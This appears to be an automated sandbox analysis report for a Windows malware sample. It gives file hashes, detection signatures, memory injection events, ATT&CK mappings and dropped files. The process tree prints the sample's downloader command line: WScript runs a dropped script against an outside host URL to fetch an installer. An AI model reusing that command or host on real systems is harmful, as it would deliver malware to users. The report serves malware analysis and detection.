ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875

General

Target

ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe
Size

184KB
MD5

02ac4c1c82a006f1ad477e04122b6584
SHA1

c344256ff5777e3883f145b232c9fda33c1f0ed3
SHA256

ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875
SHA512

4ddb36316e93e4004a4a9015973c25660cedcd7ebf7f04986b5e526f43655def95d287548abd134fc1d7a5d0aa843374890bd0a85f759d8325d44f1a6ddbb263
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3e:/7BSH8zUB+nGESaaRvoB7FJNndn3

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 10 IoCs

flow	pid	Process
2	2032	WScript.exe
5	2032	WScript.exe
6	1692	WScript.exe
8	1692	WScript.exe
9	1356	WScript.exe
11	1356	WScript.exe
12	1756	WScript.exe
14	1756	WScript.exe
15	896	WScript.exe
17	896	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1668	1304	WerFault.exe	26

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	2	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	6	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	9	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	12	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1304 wrote to memory of 2032	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	27
PID 1304 wrote to memory of 2032	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	27
PID 1304 wrote to memory of 2032	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	27
PID 1304 wrote to memory of 2032	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	27
PID 1304 wrote to memory of 1692	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	30
PID 1304 wrote to memory of 1692	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	30
PID 1304 wrote to memory of 1692	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	30
PID 1304 wrote to memory of 1692	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	30
PID 1304 wrote to memory of 1356	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	31
PID 1304 wrote to memory of 1356	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	31
PID 1304 wrote to memory of 1356	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	31
PID 1304 wrote to memory of 1356	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	31
PID 1304 wrote to memory of 1756	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	32
PID 1304 wrote to memory of 1756	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	32
PID 1304 wrote to memory of 1756	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	32
PID 1304 wrote to memory of 1756	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	32
PID 1304 wrote to memory of 896	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	33
PID 1304 wrote to memory of 896	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	33
PID 1304 wrote to memory of 896	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	33
PID 1304 wrote to memory of 896	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	33
PID 1304 wrote to memory of 1668	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	34
PID 1304 wrote to memory of 1668	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	34
PID 1304 wrote to memory of 1668	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	34
PID 1304 wrote to memory of 1668	1304	ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe	34

C:\Users\Admin\AppData\Local\Temp\ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe
"C:\Users\Admin\AppData\Local\Temp\ad15c00e16520f8ecbd54ef18789f52b5a68e7b513e09167226a5122b9273875.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1304
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2157.js" http://www.djapp.info/?domain=HZmWdxdueb.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf2157.exe
  2⤵
  - Blocklisted process makes network request
  PID:2032
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2157.js" http://www.djapp.info/?domain=HZmWdxdueb.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf2157.exe
  2⤵
  - Blocklisted process makes network request
  PID:1692
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2157.js" http://www.djapp.info/?domain=HZmWdxdueb.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf2157.exe
  2⤵
  - Blocklisted process makes network request
  PID:1356
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2157.js" http://www.djapp.info/?domain=HZmWdxdueb.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf2157.exe
  2⤵
  - Blocklisted process makes network request
  PID:1756
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2157.js" http://www.djapp.info/?domain=HZmWdxdueb.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf2157.exe
  2⤵
  - Blocklisted process makes network request
  PID:896
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 608
  2⤵
  - Program crash
  PID:1668

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fuf2157.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\N380RBG2.txt

Filesize
98B

MD5
e5be553d17486365f82a9f2b8bb720be

SHA1
1a974e988cb8e42d38e80f9a2f93574229962b64

SHA256
33e6b313f1c32d2043757e300ef48b39a4e35278aa3449ad164ff6df3ce32b39

SHA512
9e56e3e57bae792819d81a02f9a70a0d534db15854394872a79851f6b76d9f36d4e76e8762eec041f258506467300f18e5bc310e3d42c01c6744a91a88aa09e2

Download Submit
memory/896-65-0x0000000000000000-mapping.dmp

Download
memory/1304-54-0x00000000762E1000-0x00000000762E3000-memory.dmp

Filesize
8KB

Download
memory/1356-61-0x0000000000000000-mapping.dmp

Download
memory/1668-67-0x0000000000000000-mapping.dmp

Download
memory/1692-58-0x0000000000000000-mapping.dmp

Download
memory/1756-63-0x0000000000000000-mapping.dmp

Download
memory/2032-55-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing